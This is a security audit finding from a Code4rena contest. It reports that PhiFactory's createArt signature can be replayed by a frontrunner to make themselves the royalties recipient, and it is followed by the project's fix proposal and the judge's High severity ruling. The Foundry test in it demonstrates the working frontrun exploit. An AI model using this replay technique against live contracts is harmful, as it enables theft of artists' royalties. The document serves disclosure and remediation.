code-423n4 / 2024-08-phi-findings

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Signature replay in `createArt` allows to impersonate artist and steal royalties #70

Open howlbot-integration[bot] opened 1 month ago

howlbot-integration[bot] commented 1 month ago

Lines of code

Vulnerability details


Loss of funds: anyone can frontrun the createArt transaction, reusing the original signature but supplying their own config. As a result the artist, the royalties recipient, as well the the royalty BPS can be set arbitrarily, leading to stealing the royalties from the artist, and achieving other impacts.


Function PhiFactory::createArt() doesn't limit the signature to either the specific submitter, nor does it include into the signed data the CreateConfig parameters, which in particular include the artist, the royalties receiver, as well as other parameters. Other impacts are possible but here is one specific scenario:

  1. The legitimate party creates a valid signature, config, and submits the createArt transaction
  2. An attacker observes createArt transaction in the mempool, and frontruns it, reusing the signature, but with their own config where they are the royalties recipient
  3. Attacker's transaction succeeds, setting them as the royalties recipient
  4. The original transaction gets executed, and also succeeds, because createERC1155Internal succeeds both when a new PhiNFT1155 contract is created, as well as when it exists already
  5. The legitimate user doesn't notice the difference: both ArtContractCreated and NewArtCreated events are emitted correctly (only NewArtCreated is emitted twice).

As a result, the attacker gets all rewards sent to the PhiRewards contract from PhiNFT1155 when the legitimate party claims an NFT token (see PhiNFT1155::claimFromFactory()).

Other possible impacts (a non-exclusive list):

Proof of Concept

Drop this test to PhiFactory.t.sol and execute via forge test --match-test Kuprum

function testKuprum_ImpersonateArtist() public {
    // The owner prepares the signature, the config,
    //  and submits the `createArt` transaction
    string memory artIdURL = "sample-art-id";
    bytes memory credData = abi.encode(1, owner, "SIGNATURE", 31_337, bytes32(0));
    bytes memory signCreateData = abi.encode(expiresIn, artIdURL, credData);
    bytes32 createMsgHash = keccak256(signCreateData);
    bytes32 createDigest = ECDSA.toEthSignedMessageHash(createMsgHash);
    (uint8 cv, bytes32 cr, bytes32 cs) = vm.sign(claimSignerPrivateKey, createDigest);
    if (cv != 27) cs = cs | bytes32(uint256(1) << 255);
    IPhiFactory.CreateConfig memory config =
        IPhiFactory.CreateConfig(artCreator, receiver, END_TIME, START_TIME, MAX_SUPPLY, MINT_FEE, false);

    // user1 observes `createArt` transaction in the mempool, and frontruns it,
    // reusing the signature, but with their own config where user1 is the receiver, 1 ether);
    IPhiFactory.CreateConfig memory user1Config =
        IPhiFactory.CreateConfig(artCreator, user1, END_TIME, START_TIME, MAX_SUPPLY, MINT_FEE, false);
    phiFactory.createArt{ value: NFT_ART_CREATE_FEE }(signCreateData, abi.encodePacked(cr, cs), user1Config);

    // Owner's `createArt` succeeds; there is also no difference in the `ArtContractCreated` event
    phiFactory.createArt{ value: NFT_ART_CREATE_FEE }(signCreateData, abi.encodePacked(cr, cs), config);

    // Verify that user1 is now the royalties recepient
    uint256 artIdNum = 1;
    IPhiFactory.ArtData memory updatedArt = phiFactory.artData(artIdNum);
    assertEq(updatedArt.receiver, user1, "user1 should be the royalties recepient");

Tools Used

Manual review; Foundry.

Recommended Mitigation Steps

We recommend the following steps:

Assessed type

Invalid Validation

ZaK3939 commented 1 month ago

We will disregard the proposed mitigation, cuz incorrect. Instead, we will extend the signature by introducing nonce, creator, and executor. However, I believe this issue should be classified as Medium rather than High. Addresses that appear to be invalid artist addresses are easily verifiable on the frontend (for example, by checking for lack of prior history). Additionally, artists have certification badges through EAS (Ethereum Attestation Service). so, we don't necessarily see a problem with multiple arts being created, but let me improve our logic by this.

struct SignatureData {
    uint256 expiresIn;
    uint256 nonce;
    address creator;
    address executor;
    string uri;
    bytes credData;

function createArt(
    bytes calldata signedData_,
    bytes calldata signature_,
    CreateConfig memory createConfig_
    returns (address)
    _validateArtCreationSignature(signedData_, signature_);

    SignatureData memory data = abi.decode(signedData_, (SignatureData));

    ERC1155Data memory erc1155Data = _createERC1155Data(artIdCounter, createConfig_, data.uri, data.credData);
    address artAddress = createERC1155Internal(artIdCounter, erc1155Data);

    return artAddress;

function _validateArtCreationSignature(bytes memory signedData_, bytes calldata signature_) private view {
    SignatureData memory data = abi.decode(signedData_, (SignatureData));
    if (_recoverSigner(keccak256(signedData_), signature_) != phiSignerAddress) revert AddressNotSigned();
    if (data.expiresIn <= block.timestamp) revert SignatureExpired();
    if (data.creator != address(0) && data.creator != _msgSender()) revert InvalidCreator();
    if (data.executor != address(0) && data.executor != _msgSender()) revert InvalidExecutor();
    if (data.nonce != nonces[_msgSender()]) revert InvalidNonce();
c4-judge commented 1 month ago

fatherGoose1 changed the severity to 2 (Med Risk)

c4-judge commented 1 month ago

fatherGoose1 changed the severity to 3 (High Risk)

fatherGoose1 commented 1 month ago

High. This vulnerability would undermine the entire art creation process.

c4-judge commented 1 month ago

fatherGoose1 marked the issue as satisfactory

c4-judge commented 1 month ago

fatherGoose1 marked the issue as selected for report